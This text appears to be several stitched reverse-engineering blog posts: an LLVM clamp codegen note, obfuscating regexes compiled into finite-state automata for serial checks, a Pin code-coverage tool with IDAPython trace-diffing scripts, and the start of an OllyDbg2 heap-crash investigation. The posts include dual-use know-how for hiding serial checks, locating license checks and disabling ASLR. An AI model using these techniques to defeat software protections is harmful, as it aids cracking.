All it does is add select instructions to the list of instruction types to consider potentially dereferenceable. Though it seems to fix the issue (and alive2 seems to like it), this is otherwise untested. Also, the codegen still isn’t perfect. Though the redundant memory accesses are removed, there are still many more instructions than in our libcxx fix (and Rust’s implementation):

.LCPI0_0:
        .long   0x3f800000                        # float 1
.LCPI0_1: 
        .long   0xbf800000                        # float -1
clamp2(float):                                    # @clamp2(float)
        movss   xmm1, dword ptr [rip + .LCPI0_0]  # xmm1 = mem[0],zero,zero,zero
        minss   xmm1, xmm0 
        movss   xmm2, dword ptr [rip + .LCPI0_1]  # xmm2 = mem[0],zero,zero,zero
        cmpltss xmm0, xmm2
        movaps  xmm3, xmm0
        andnps  xmm3, xmm1
        andps   xmm0, xmm2
        orps    xmm0, xmm3
        ret

However, this is because of the ternary operators done in the original libcxx clamp:

template<class _Tp, class _Compare>
const _Tp& clamp(const _Tp& __v, const _Tp& __lo, const _Tp& __hi, _Compare __comp)
{
    _LIBCPP_ASSERT(!__comp(__hi, __lo), "Bad bounds passed to std::clamp");
    return __comp(__v, __lo) ? __lo : __comp(__hi, __v) ? __hi : __v;

}

The reason this doesn’t look as good is because LLVM needs to store the original value of __v for the second comparison. Due to this, it then can’t optimize the second part of this computation into a maxss as that would produce different behavior when __lo is greater than __hi and __v is negative.

#include <cstdio>

const float& ref_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;
}

const float& better_ref_clamp(const float& v, const float& lo, const float& hi) {
    const float *out;
    out = (v < lo) ? &lo : &v;
    out = (*out > hi) ? &hi : out;
    return *out;
}

int main() {
    printf("%f\n", ref_clamp(-2.f, 1.f, -1.f));        // this prints 1.000000
    printf("%f\n", better_ref_clamp(-2.f, 1.f, -1.f)); // this prints -1.000000
}

Even though we know this is undefined behavior in C++, LLVM doesn’t have enough information to know that. Adjusting code generation accordingly would be no easy task either. Despite all of this though, it does show how versatile LLVM truly is; relatively simple changes can have significant results.
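To make the difference between the two clamp formulations easier to poke at, here is a small Python model of both. It is only a sketch of the comparison logic (the function names mirror the C++ ones above, the grid of test values is an arbitrary assumption), and it says nothing about what LLVM actually emits.

```python
from itertools import product


def ref_clamp(v, lo, hi):
    # Mirrors `(v < lo) ? lo : (v > hi) ? hi : v`: both tests read the original v.
    return lo if v < lo else (hi if v > hi else v)


def better_ref_clamp(v, lo, hi):
    # Mirrors the pointer version: the second test reads the result of the first.
    out = lo if v < lo else v
    return hi if out > hi else out


def disagreements(values):
    """Return every (v, lo, hi) triple on which the two clamps differ."""
    return [
        (v, lo, hi)
        for v, lo, hi in product(values, repeat=3)
        if ref_clamp(v, lo, hi) != better_ref_clamp(v, lo, hi)
    ]


if __name__ == "__main__":
    grid = [-2.0, -1.0, 0.0, 1.0, 2.0]  # arbitrary sample values
    bad = disagreements(grid)
    print(len(bad), "disagreeing triples")
    print("all of them have lo > hi:", all(lo > hi for _, lo, hi in bad))
```

On this grid the two versions only disagree when lo is greater than hi, which is exactly the "bad bounds" case the libcxx assertion rejects.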

Regular expressions obfuscation under the microscope

Introduction

Some months ago I came across a strange pair of functions that were playing with a finite-state automaton to validate an input. At first glance, I didn't notice that it was in fact a regex being processed, which is exactly why I spent quite some time understanding those routines. You are right to ask yourself: "Hmm, but the regex string representation should be in the binary, shouldn't it?"; the thing is, it wasn't. The purpose of this post is to focus on that kind of "compiled" regex, where the author somehow transforms the regex into an FSM directly usable in their program (for the sake of efficiency, I guess). To extract that handy string representation, you have to study the automaton.

In this short post, we are going to see what a regular expression looks like in assembly/C, and how you can hide/obfuscate it. I hope you will enjoy the read, and that you will be able both to recognize a compiled regular expression in your future reverse-engineering tasks and to heavily obfuscate your own regex!

Bring out the FSM

Manually

Before automating things, let's see how we can implement a simple regex in C. It's always easier to reverse-engineer something you have implemented at least once in your life, even if the actual implementation is slightly different from the one you did. Let's say we want to have an automaton that matches "Hi-[0-9]{4}".

NOTE: I just had the chance to have a conversation with Michal, and he is totally right in saying that the automaton isn't really the regex we said it was. Here is an example of what the regex should match: 'Hi-GARBAGEGARBAGE_Hi-1234'. Our automaton doesn't rewind its state to zero when the input stops matching; it just bails out. To fix that, we could replace the return statements with a "state = 0" statement :). Thank you to Michal for the remark.

Now, if we extract an FSM from that string representation, we get this one:

FSM_example.png
Here is this automaton implemented in C:
#include <stdio.h>
#include <string.h>

unsigned char checkinput(char* s)
{
    unsigned int state = 0;
    do
    {
        switch(state)
        {
            case 0:
            {
                if(*s == 'H')
                    state = 1;

                break;
            }

            case 1:
            {
                if(*s == 'i')
                    state = 2;
                else
                    return 0;

                break;
            }

            case 2:
            {
                if(*s == '-')
                    state = 3;
                else
                    return 0;

                break;
            }

            case 3 ... 6: /* case ranges are a GCC/Clang extension, not standard C */
            {
                if(*s >= '0' && *s <= '9')
                    state++;
                else
                    return 0;

                break;
            }

            case 7:
                return 1;
        }
    } while(*s++);

    return 0;
}

int main(int argc, char *argv[])
{
    if(argc != 2)
    {
        printf("./fsm <string>\n");
        return 0;
    }

    if(checkinput(argv[1]))
        printf("Good boy.\n");
    else
        printf("Bad boy.\n");

    return 1;
}

If we try to execute the program:

> fsm_example.exe garbage-Hi-1337-garbage
Good boy.

> fsm_example.exe garbage-Hi-1337
Good boy.

> fsm_example.exe Hi-1337-garbage
Good boy.

> fsm_example.exe Hi-dudies
Bad boy.

The purpose of that trivial example was just to show you how a regex string representation can be compiled into something harder to analyze but also more efficient (it doesn't need a compilation step at runtime, which is why you may encounter that kind of thing in real (?) software). Even if the code seems trivial at first sight, when you look at it at the assembly level, it takes a bit of time to figure out it's a simple "Hi-[0-9]{4}" regex.
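The rewind idea from the note earlier in this section can be sketched in a few lines of Python. This is a hedged model, not a port of the C program: check_input is a name chosen here, and the rewind is slightly smarter than a plain "state = 0" because the character that broke the match may itself be the 'H' that starts a new one.

```python
def check_input(text):
    """Return True if text contains a match for Hi-[0-9]{4}."""
    expected = ["H", "i", "-"]  # literal characters for states 0, 1 and 2
    state = 0
    for ch in text:
        if state < 3:
            matched = ch == expected[state]
        else:
            matched = "0" <= ch <= "9"  # states 3..6 each consume one digit
        if matched:
            state += 1
        else:
            # Rewind instead of returning. The current character may itself
            # start a new match, so 'H' restarts in state 1 rather than 0.
            state = 1 if ch == "H" else 0
        if state == 7:  # accepting state: "Hi-" followed by four digits
            return True
    return False


if __name__ == "__main__":
    for sample in ("Hi-GARBAGEGARBAGE_Hi-1234", "HHi-1234", "Hi-dudies"):
        print(sample, check_input(sample))
```

The shortcut of restarting in state 1 on 'H' only works because 'H' appears nowhere else in this particular pattern; a general regex needs a proper failure function or a DFA built from an NFA.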

cfg.png
In that kind of analysis, it's really important to find the "state" variable that allows the program to pass through the different nodes of the FSM. Then, you also have to figure out how you can reach a specific node, and all the nodes reachable from a specific one. To make it short, at the end of your analysis you really want to have a clean FSM like the one we drew earlier. And once you have it, you want to eliminate unreachable nodes and minimize it in order to remove potential automaton obfuscation.
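Once the automaton has been recovered as a transition table, removing unreachable nodes is a plain graph traversal. Here is a minimal sketch, assuming the FSM is stored as a dict mapping each state to a dict of {input label: next state}; that representation, the 'digit' label and the junk state 99 are all made up for the example.

```python
from collections import deque


def reachable_states(transitions, start):
    """Breadth-first walk over the transition table, starting at `start`."""
    seen = {start}
    queue = deque([start])
    while queue:
        state = queue.popleft()
        for target in transitions.get(state, {}).values():
            if target not in seen:
                seen.add(target)
                queue.append(target)
    return seen


def prune_unreachable(transitions, start):
    """Return a copy of the table without the states nobody can reach."""
    keep = reachable_states(transitions, start)
    return {s: dict(edges) for s, edges in transitions.items() if s in keep}


# Hypothetical recovered table for Hi-[0-9]{4}, plus one decoy state (99).
fsm = {
    0: {"H": 1}, 1: {"i": 2}, 2: {"-": 3},
    3: {"digit": 4}, 4: {"digit": 5}, 5: {"digit": 6}, 6: {"digit": 7},
    7: {},
    99: {"x": 0},  # has an edge into the FSM, but nothing leads to it
}

if __name__ == "__main__":
    print(sorted(prune_unreachable(fsm, 0)))
```

This only covers the "eliminate unreachable nodes" half; proper minimization (merging equivalent states) needs an algorithm such as Hopcroft's and is not shown here.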

Automatically

But what if our regex was far more complex? It would be hell to implement the FSM manually. That's why I wanted to find some ways to generate your own FSM from a regex string.

With re2c

re2c is a cool and simple tool that allows you to describe your regex in a C comment, then it will generate the code of the scanner. As an example, here is the source code to generate the scanner for the previous regex:

{% include_code regular_expressions_obfuscation_under_the_microscope/fsm_re2c_example.c %}

Once you feed that source to re2c, it gives you that scanner ready to be compiled:

{% include_code regular_expressions_obfuscation_under_the_microscope/fsm_re2c_generated_non_optimized.c %}

Cool, isn't it? But in fact, if you compile it and run Hex-Rays on it (even with optimizations disabled), you will be completely disappointed: the decompiled output is heavily simplified. Not cool for us (cool for the reverse-engineer though!).

hexrays.png

By hand

That's why I tried to generate the C code of the scanner myself. The first thing you need is a "regular-expression string" to FSM Python library: a sort-of regex compiler. Then, once you are able to generate an FSM from a regular expression string, you are totally free to do whatever you want with the automaton. You can obfuscate it, try to optimize it, etc. You are also free to generate the C code you want. Here is the ugly-buggy-PoC code I wrote to generate the scanner for the regex used previously:

{% include_code regular_expressions_obfuscation_under_the_microscope/generate_c_fsm.py %}

Now, if you open it in IDA the CFG will look like this:

hell_yeah.png
Not that fun to reverse-engineer I guess. If you are curious enough to look at the complete source, here it is: fsm_generated_by_hand_example.c.

Thoughts to be more evil: one input to bind all the regex in the darkness

Keep in mind, the previous examples are really trivial to analyze, even if we had to do it at the assembly level without Hexrays (by the way Hexrays does a really nice job to simplify the assembly code, cool for us!). Even if we have slightly obfuscated the automaton with useless states/transitions, we may want to make things harder.

One interesting idea to bother the reverse-engineer is to use several regex as "input filters". You create one first "permissive" regex that has many possible valid inputs. To reduce the valid inputs set you use another regex as a filter. And you do that until you have only one valid input: your serial. Note that you may also want to build complex regex, because you are evil.

In that case, the reverse-engineer has to analyze all the different regex. If they focus on one specific regex, they will find too many valid inputs, whereas only one gives the good boy (the intersection of the valid input sets of all the regex).
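To get a feel for the filter idea, here is a toy version in Python using the standard re module. The three patterns and the serial are invented for the illustration; real filters would be compiled into obfuscated automata rather than left as strings.

```python
import re

# Hypothetical filters: each one alone accepts many inputs.
FILTERS = [
    re.compile(r"Hi-[0-9]{4}"),  # accepts 10000 serials
    re.compile(r"Hi-1.*7"),      # first digit 1, last digit 7
    re.compile(r".{4}33."),      # the two middle digits are 3
]


def passes_all(candidate):
    """A serial is valid only if every filter accepts the whole string."""
    return all(f.fullmatch(candidate) for f in FILTERS)


def accepted_by(index, candidates):
    """Inputs accepted by one filter taken in isolation."""
    return [c for c in candidates if FILTERS[index].fullmatch(c)]


if __name__ == "__main__":
    candidates = ["Hi-%04d" % n for n in range(10000)]
    for i in range(len(FILTERS)):
        print("filter", i, "alone accepts", len(accepted_by(i, candidates)))
    print("intersection:", [c for c in candidates if passes_all(c)])
```

Looking at any single filter leaves at least a hundred candidates; only the intersection pins down the serial.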

If you are interested in the subject, a cool resource I've seen recently that does similar things is a CTF task write-up written by Michal Kowalczyk: read it, it's awesome.

UPDATE: You should also read the follow-up made by @fdfalcon "A black-box approach against obfuscated regular expressions using Pin". Using Pin to defeat the FSM obfuscation, and to prove my obfuscation was a bit buggy: two birds, one stone :)).

Messing with automata is good for you.

Some thoughts about code-coverage measurement with Pin

Introduction

Sometimes, when you are reverse-engineering binaries, you need to measure, or at least to have an idea of, how much of your target's code a given execution covers. It can be for fuzzing purposes: maybe you have a huge set of inputs (files, network traffic, anything) and you want to get the same coverage with only a subset of them. Or maybe you are not really interested in the measure itself, but only in the coverage differences between two executions of your target: to locate where your program handles a specific feature, for example.

But it's not a trivial problem: usually you don't have the source code of the target, and you want it to be quick. The other thing is that you don't have an input that covers the whole code base, and you don't even know if one is possible, so you can't compare your analysis to that "ideal one". Long story short, you can't say to the user "OK, this input covers 10% of your binary". But you can clearly record what your program is doing with input A, what it is doing with input B, and then analyze the differences. That way you can have a (more precise?) idea about which input seems to have better coverage than another.

Note also, this is a perfect occasion to play with Pin :-)).

In this post, I will briefly explain how you can build that kind of tool using Pin, and how it can be used for reverse-engineering purposes.
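The "same coverage with only a subset of the inputs" idea from the introduction boils down to a set-cover problem. A greedy pass is a common approximation; the sketch below assumes you already have, for each input, the set of basic block addresses it reached (the file names and addresses are placeholders, and minimize_corpus is a name picked for this example).

```python
def minimize_corpus(coverage):
    """Greedy set cover: pick inputs until every seen basic block is covered.

    `coverage` maps an input name to the set of basic block addresses it hit.
    Ties are broken by input name so the result is reproducible.
    """
    remaining = set()
    for blocks in coverage.values():
        remaining |= blocks
    chosen = []
    while remaining:
        # sorted() fixes the iteration order; max() keeps the first best entry.
        best = max(sorted(coverage), key=lambda name: len(coverage[name] & remaining))
        chosen.append(best)
        remaining -= coverage[best]
    return chosen


if __name__ == "__main__":
    traces = {
        "a.bin": {0x401000, 0x401010, 0x401020},
        "b.bin": {0x401010, 0x401020},
        "c.bin": {0x401030},
    }
    print(minimize_corpus(traces))
```

The greedy choice is not guaranteed to be the smallest possible subset, but it is cheap and usually good enough to trim a corpus.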

Our Pintool

If you have never heard about Intel's DBI framework Pin, I have made a selection of links for you; read them and understand them. You won't be able to use Pin correctly if you don't know a bit about how it works:

Concerning my setup, I'm using Pin 2.12 on Windows 7 x64 with VC2010 and I'm building x86 Pintools (works great with Wow64). If you want to build easily your Pintool outside of the Pin tool kit directory I've made a handy little python script: setup_pintool_project.py.

Before coding, we need to talk a bit about what we really want. This is simple, we want a Pintool that:

  • is as efficient as possible. OK, that's a real problem; even if Pin is more efficient than other DBI frameworks (like DynamoRIO or Valgrind), it is always kind of slow.
  • keeps track of all the basic blocks executed. We will store the address of each basic block executed and its number of instructions.
  • generates a JSON report about a specific execution. Once we have that report, we are free to use Python scripts to do whatever we want. To do that, we will use Jansson: it's easy to use, open-source and written in C.
  • doesn't instrument Windows APIs. We don't want to waste our CPU time being in the native libraries of the system ; it's part of our little "tricks" to improve the speed of our Pintool.

I think it's time to code now: first, let's define several data structures in order to store the information we need:

typedef std::map<std::string, std::pair<ADDRINT, ADDRINT> > MODULE_BLACKLIST_T;
typedef MODULE_BLACKLIST_T MODULE_LIST_T;
typedef std::map<ADDRINT, UINT32> BASIC_BLOCKS_INFO_T;

The first two types will be used to hold module-related information: path of the module, start address and end address. The third one is simple: the key is the basic block address and the value is its number of instructions.
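To show how such a module map can be queried, here is a Python model of the blacklist lookup. It is only a guess at what a helper like is_address_in_blacklisted_modules could do (its body is not shown in this post); the module path and addresses below are invented.

```python
def is_address_blacklisted(blacklist, address):
    """True if `address` falls inside any blacklisted [low, high] range.

    `blacklist` models MODULE_BLACKLIST_T: module path -> (low, high).
    Both bounds are treated as inclusive.
    """
    return any(low <= address <= high for low, high in blacklist.values())


# Hypothetical content, for illustration only.
blacklist = {
    r"C:\Windows\SysWOW64\ntdll.dll": (0x77000000, 0x7717FFFF),
    "single-address-entry": (0x74AB2320, 0x74AB2320),
}

if __name__ == "__main__":
    for addr in (0x77001234, 0x74AB2320, 0x00401000):
        print(hex(addr), is_address_blacklisted(blacklist, addr))
```

A linear scan is fine for a handful of modules; with many ranges, a sorted list plus bisect would avoid walking the whole map for every basic block.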

Then we are going to define our instrumentation callbacks:

  • one that is called whenever a module is loaded, so we can store its base/end address (a second one, for the traces, comes right after). You can register these callbacks using IMG_AddInstrumentFunction and TRACE_AddInstrumentFunction.
VOID image_instrumentation(IMG img, VOID * v)
{
    ADDRINT module_low_limit = IMG_LowAddress(img), module_high_limit = IMG_HighAddress(img); 

    if(IMG_IsMainExecutable(img))
        return;

    const std::string image_path = IMG_Name(img);

    std::pair<std::string, std::pair<ADDRINT, ADDRINT> > module_info = std::make_pair(
        image_path,
        std::make_pair(
            module_low_limit,
            module_high_limit
        )
    );

    module_list.insert(module_info);
    module_counter++;

    if(is_module_should_be_blacklisted(image_path))
        modules_blacklisted.insert(module_info);
}
  • one to be able to insert calls before every basic block.

The thing is: Pin doesn't have a BBL_AddInstrumentFunction, so we have to instrument the traces and iterate through them to get the basic blocks. It's done really easily with the TRACE_BblHead, BBL_Valid and BBL_Next functions. Of course, if the basic block address is in a blacklisted address range, we don't insert a call to our analysis function.

VOID trace_instrumentation(TRACE trace, VOID *v)
{
    for(BBL bbl = TRACE_BblHead(trace); BBL_Valid(bbl); bbl = BBL_Next(bbl))
    {
        if(is_address_in_blacklisted_modules(BBL_Address(bbl)))
            continue;

        BBL_InsertCall(
            bbl,
            IPOINT_ANYWHERE,
            (AFUNPTR)handle_basic_block,
            IARG_FAST_ANALYSIS_CALL,

            IARG_UINT32,
            BBL_NumIns(bbl),

            IARG_ADDRINT,
            BBL_Address(bbl),

            IARG_END
        );
    }
}

For efficiency reasons, we let Pin decide where it puts its JITed call to the analysis function handle_basic_block; we also use the fast linkage (it basically means the function will be called using the __fastcall calling convention).

The analysis function is also trivial: we just need to store basic block addresses in a global variable. The function doesn't have any branch, which means Pin will most likely inline it; that's also good for efficiency.

VOID PIN_FAST_ANALYSIS_CALL handle_basic_block(UINT32 number_instruction_in_bb, ADDRINT address_bb)
{
    basic_blocks_info[address_bb] = number_instruction_in_bb;
}

Finally, just before the process ends, we serialize our data into a simple JSON report thanks to Jansson. You may also want to use a binary serialization to get a smaller report.

VOID save_instrumentation_infos()
{
    /// basic_blocks_info section
    json_t *bbls_info = json_object();
    json_t *bbls_list = json_array();
    json_t *bbl_info = NULL; // allocated per basic block in the loop below
    // unique_count field
    json_object_set_new(bbls_info, "unique_count", json_integer(basic_blocks_info.size()));
    // list field
    json_object_set_new(bbls_info, "list", bbls_list);
    for(BASIC_BLOCKS_INFO_T::const_iterator it = basic_blocks_info.begin(); it != basic_blocks_info.end(); ++it)
    {
        bbl_info = json_object();
        json_object_set_new(bbl_info, "address", json_integer(it->first));
        json_object_set_new(bbl_info, "nbins", json_integer(it->second));
        json_array_append_new(bbls_list, bbl_info);
    }

    /* .. same thing for blacklisted modules, and modules .. */
    /// Building the tree
    json_t *root = json_object();
    json_object_set_new(root, "basic_blocks_info", bbls_info);
    json_object_set_new(root, "blacklisted_modules", blacklisted_modules);
    json_object_set_new(root, "modules", modules);

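    /// Writing the report
    FILE* f = fopen(KnobOutputPath.Value().c_str(), "w");
    if(f != NULL)
    {
        json_dumpf(root, f, JSON_COMPACT | JSON_ENSURE_ASCII);
        fclose(f);
    }

    // json_object_set_new() handed the children over to root, so one decref frees the tree
    json_decref(root);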
}
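For reference, here is what the basic_blocks_info part of that report looks like when rebuilt with Python's json module. This is a sketch derived from the field names used in the C++ above ("unique_count", "list", "address", "nbins"); the two module sections are left out because their layout is elided in the snippet, and the sample addresses are invented.

```python
import json


def build_report(basic_blocks_info):
    """Model of the 'basic_blocks_info' section of the Pintool report.

    `basic_blocks_info` maps a basic block address to its instruction count,
    like BASIC_BLOCKS_INFO_T. Keys are sorted to mimic std::map iteration.
    """
    blocks = [
        {"address": address, "nbins": nbins}
        for address, nbins in sorted(basic_blocks_info.items())
    ]
    return {"basic_blocks_info": {"unique_count": len(blocks), "list": blocks}}


def dump_report(report):
    # Compact separators and ASCII-only output, roughly what
    # JSON_COMPACT | JSON_ENSURE_ASCII ask Jansson for.
    return json.dumps(report, separators=(",", ":"), ensure_ascii=True)


if __name__ == "__main__":
    sample = {0x401020: 3, 0x401000: 5}  # made-up addresses
    print(dump_report(build_report(sample)))
```

Any consumer script then only needs report['basic_blocks_info']['list'] to get back the (address, nbins) pairs.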

If, like me, you are on an x64 Windows system but you are instrumenting x86 processes, you should directly blacklist the area where Windows keeps the SystemCallStub (you know, the "JMP FAR"). To do that, we simply use the __readfsdword intrinsic to read the field TEB32.WOW32Reserved, which holds the address of that stub. That way you won't waste CPU time every time your program performs a system call.

ADDRINT wow64stub = __readfsdword(0xC0);
modules_blacklisted.insert(
    std::make_pair(
        std::string("wow64stub"),
        std::make_pair(
            wow64stub,
            wow64stub
        )
    )
);

The entire Pintool source code is here: pin-code-coverage-measure.cpp.

I want to see the results.

I agree it's neat to have a JSON report with the basic blocks executed by our program, but it's not really readable for a human. We can use an IDAPython script that parses our report and colors all the instructions executed. It makes it much easier to see the execution path taken by your program.

To color an instruction you have to use the functions idaapi.set_item_color and idaapi.del_item_color (if you want to reset the color). You can also use idc.ItemSize to get the size of an instruction; that way you can iterate over a specific number of instructions (remember, we stored that in our JSON report!).

# idapy_color_path_from_json.py
import json
import idc
import idaapi
from collections import defaultdict

def color(ea, nbins, c):
    '''Color 'nbins' instructions starting from ea'''
    colors = defaultdict(int, {
            'black' : 0x000000,
            'red' : 0x0000FF,
            'blue' : 0xFF0000,
            'green' : 0x00FF00
        }
    )
    for _ in range(nbins):
        idaapi.del_item_color(ea)
        idaapi.set_item_color(ea, colors[c])
        ea += idc.ItemSize(ea)

def main():
    f = open(idc.AskFile(0, '*.json', 'Where is the JSON report you want to load ?'), 'r')
    c = idc.AskStr('black', 'Which color do you want ?').lower()
    report = json.load(f)
    for i in report['basic_blocks_info']['list']:
        print '%x' % i['address'],
        try:
            color(i['address'], i['nbins'], c)
            print 'ok'
        except Exception, e:
            print 'fail: %s' % str(e)
    print 'done'    
    return 1

if __name__ == '__main__':
    main()

Here is an example generated by launching "ping google.fr", we can clearly see in black the nodes reached by the ping utility:

ping.png
You can even start to generate several traces with different options, to see where each argument is handled and analyzed by the program :-).

Trace differences

As you saw previously, it can be handy to actually see the execution path our program took. But if you think about it, it can be even handier to look at the differences between two executions. It could be used to locate a specific feature of a program: a license check, where an option is checked, etc.

Now, let's run another trace with, for example, "ping -n 10 google.fr". Here are the two execution traces (the previous one and the new one) and the difference between them:

pingboth.png
You can clearly identify the basic blocks and the functions that use the "-n 10" argument. If you look even closer, you are able very quickly to figure out where the string is converted into an integer:

strtoul.png
A lot of software is built around a really annoying GUI (for the reverser at least): it usually produces big binaries, or ships with a lot of external modules (like the Qt runtime libraries). The thing is, you don't really care about how the GUI works; you want to focus on the "real" code, not on that "noise". Each time you have noise somewhere, you have to figure out a way to filter it in order to keep only the interesting part. This is exactly what we are doing when we generate different execution traces of the program, and the process is pretty much the same every time:
  • You launch the application, and you exit
  • You launch the application, you do something and you exit
  • You remove the basic blocks executed in the first run in the second trace ; in order to keep only the part that does the "do something" thing. That way you filter the noise induced by the GUI to focus only on the interesting part.

Cool for us because that's pretty easy to implement via IDAPython, here is the script:

# idapy_color_diff_from_jsons.py https://github.com/0vercl0k/stuffz/blob/master/pin-code-coverage-measure/idapy_color_diff_from_jsons.py
import json
import idc
import idaapi
from collections import defaultdict

def color(ea, nbins, c):
    '''Color 'nbins' instructions starting from ea'''
    colors = defaultdict(int, {
            'black' : 0x000000,
            'red' : 0x0000FF,
            'blue' : 0xFF0000,
            'green' : 0x00FF00
        }
    )
    for _ in range(nbins):
        idaapi.del_item_color(ea)
        idaapi.set_item_color(ea, colors[c])
        ea += idc.ItemSize(ea)

def main():
    f = open(idc.AskFile(0, '*.json', 'Where is the first JSON report you want to load ?'), 'r')
    report = json.load(f)
    l1 = report['basic_blocks_info']['list']

    f = open(idc.AskFile(0, '*.json', 'Where is the second JSON report you want to load ?'), 'r')
    report = json.load(f)
    l2 = report['basic_blocks_info']['list']
    c = idc.AskStr('black', 'Which color do you want ?').lower()

    addresses_l1 = set(r['address'] for r in l1)    
    addresses_l2 = set(r['address'] for r in l2)
    dic_l2 = dict((k['address'], k['nbins']) for k in l2)

    diff = addresses_l2 - addresses_l1
    print '%d bbls in the first execution' % len(addresses_l1)
    print '%d bbls in the second execution' % len(addresses_l2)
    print 'Differences between the two executions: %d bbls' % len(diff)

    assert(len(addresses_l1) < len(addresses_l2))

    funcs = defaultdict(list)
    for i in diff:
        try:
            color(i, dic_l2[i], c)
            funcs[idaapi.get_func(i).startEA].append(i)
        except Exception, e:
            print 'fail %s' % str(e)

    print 'A total of %d different sub:' % len(funcs)
    for s in funcs.keys():
        print '%x' % s

    print 'done'    
    return 1

if __name__ == '__main__':
    main()

By the way, keep in mind we are only talking about deterministic programs (ones that always execute the same path if you give them the same inputs). If the same inputs don't lead to the exact same execution every time, your program is not deterministic.

Also, don't forget about ASLR: if you want to compare basic block addresses executed at two different times, trust me, you want your binary loaded at the same base address. If you want to quickly patch a single file, I've made a little Python script that can be handy sometimes: remove_aslr_bin.py; otherwise, booting your Windows XP virtual machine is the easy solution.
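For the curious, opting a single PE file out of ASLR comes down to clearing one bit, IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE (0x0040), in the DllCharacteristics field of the optional header. The sketch below is not the remove_aslr_bin.py script mentioned above, just an independent illustration working on a bytes buffer; clear_dynamic_base is a name chosen here, and the PE checksum is deliberately left untouched.

```python
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040

# DllCharacteristics sits 70 bytes into the optional header (PE32 and PE32+),
# which follows the 4-byte "PE\0\0" signature and the 20-byte COFF header.
DLL_CHARACTERISTICS_OFFSET = 4 + 20 + 70


def clear_dynamic_base(pe_bytes):
    """Return a copy of the PE image with the DYNAMIC_BASE flag cleared."""
    data = bytearray(pe_bytes)
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    offset = e_lfanew + DLL_CHARACTERISTICS_OFFSET
    (flags,) = struct.unpack_from("<H", data, offset)
    flags &= ~IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE & 0xFFFF
    struct.pack_into("<H", data, offset, flags)
    return bytes(data)
```

You would read the file in binary mode, pass its content to clear_dynamic_base, and write the result to a copy; work on a backup, since signed binaries will no longer verify.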

Does-it scale ?

These tests have been done on my Windows 7 x64 laptop with Wow64 processes (4GB RAM, i7 Q720 @ 1.6GHz). All the modules living in C:\Windows have been blacklisted. Also, note that those tests are not really accurate: I didn't launch each thing a thousand times; it's just here to give you a vague idea.

Portable Python 2.7.5.1

Without instrumentation

PS D:\> Measure-Command {start-process python.exe "-c 'quit()'" -Wait}

TotalMilliseconds : 73,1953

With instrumentation and JSON report serialization

PS D:\> Measure-Command {start-process pin.exe "-t pin-code-coverage-measure.dll -o test.json -- python.exe -c 'quit()'" -Wait} 

TotalMilliseconds : 13122,4683

VLC 2.0.8

Without instrumentation

PS D:\> Measure-Command {start-process vlc.exe "--play-and-exit hu" -Wait}

TotalMilliseconds : 369,4677

With instrumentation and JSON report serialization

PS D:\> Measure-Command {start-process pin.exe "-t pin-code-coverage-measure.dll -o test.json -- D:\vlc.exe --play-and-exit hu" -Wait}

TotalMilliseconds : 60109,204

To optimize the process you may want to blacklist some of the VLC plugins (there are tons!), otherwise your instrumented VLC is about 160 times slower than the normal one (and I didn't even try to launch the instrumentation when decoding x264 videos).
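The slowdown factors can be recomputed directly from the Measure-Command timings above (the decimal commas in the PowerShell output are written as dots here):

```python
# TotalMilliseconds values reported above, without / with instrumentation.
timings_ms = {
    "python -c quit()": (73.1953, 13122.4683),
    "vlc --play-and-exit": (369.4677, 60109.204),
}


def slowdown(native_ms, instrumented_ms):
    """How many times slower the instrumented run is."""
    return instrumented_ms / native_ms


if __name__ == "__main__":
    for name, (native, instrumented) in timings_ms.items():
        print("%-22s x%.1f" % (name, slowdown(native, instrumented)))
```

Both runs land in the same ballpark, with Python a bit worse off than VLC; these are single measurements, so treat the figures as orders of magnitude only.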

Browsers ?

You don't want to see the overhead here.

Conclusion

If you want to use that kind of tool for fuzzing purposes, I definitely encourage you to write a little program that uses the library you are targeting the same way your target does. This way you have a much smaller and less complicated binary to instrument, thus the instrumentation process will be far more efficient. And in this specific case, I really believe you can launch this Pintool on a large set of inputs (thousands) in order to pick the inputs that cover your target best. On the other hand, if you do that directly on big software like browsers, it won't scale, because you will spend your time instrumenting GUI code or stuff you don't care about.

Pin is a really powerful and accessible tool. The C++ API is really easy to use, it works on Linux, OSX, and Android for x86 (even x86_64 on the important targets), and there is also doxygen documentation. What else, seriously?

Use it, it's good for you.

References & sources of inspiration

If you find that subject cool, I've made a list of cool readings:

Pinpointing heap-related issues: OllyDbg2 off-by-one story

Introduction

Yesterday afternoon, I was peacefully coding some stuff, you know, but I couldn't get my code to work. As usual in that type of situation, you fire up your debugger in order to understand what is going on under the hood. To give you a bit of context, I was doing some inline x86 assembly, and I had put an int3 on purpose just before the piece of assembly code I thought was buggy. Once my file was loaded in OllyDbg2, I hit F9 in order to quickly reach the int3 I had slipped into the inline assembly code. A bit of single-stepping, and BOOM, I got a nasty crash. It happens sometimes, and that's uncool. Then I relaunched my binary and tried to reproduce the bug: same actions and BOOM again. OK, this time it's cool, I got a reproducible crash in OllyDbg2.

I like it when things like that happen to me (remember the crashes I found in OllyDbg/IDA here: PDB Ain't PDD); it's always a nice exercise where I have to:

  • pinpoint the bug in the application: usually not trivial when it's a real/big application
  • reverse-engineer the code involved in the bug in order to figure out why it's happening (sometimes I have the sources, sometimes I don't, like this time)

In this post, I will show you how I managed to pinpoint where the bug was, using GFlags, PageHeap and WinDbg. Then, we will reverse-engineer the buggy code in order to understand why the bug is happening, and how we can code a clean trigger.

The crash

The first thing I did was to launch WinDbg to debug OllyDbg2 to debug my binary (yeah.). Once OllyDbg2 has been started up, I reproduced exactly the same steps as previously to trigger the bug and here is what WinDbg was telling me:

HEAP[ollydbg.exe]: Heap block at 00987AB0 modified at 00987D88 past
requested size of 2d0

(a60.12ac): Break instruction exception - code 80000003 (first chance)
eax=00987ab0 ebx=00987d88 ecx=76f30b42 edx=001898a5 esi=00987ab0 edi=000002d0
eip=76f90574 esp=00189aec ebp=00189aec iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
ntdll!RtlpBreakPointHeap+0x23:
76f90574 cc              int     3

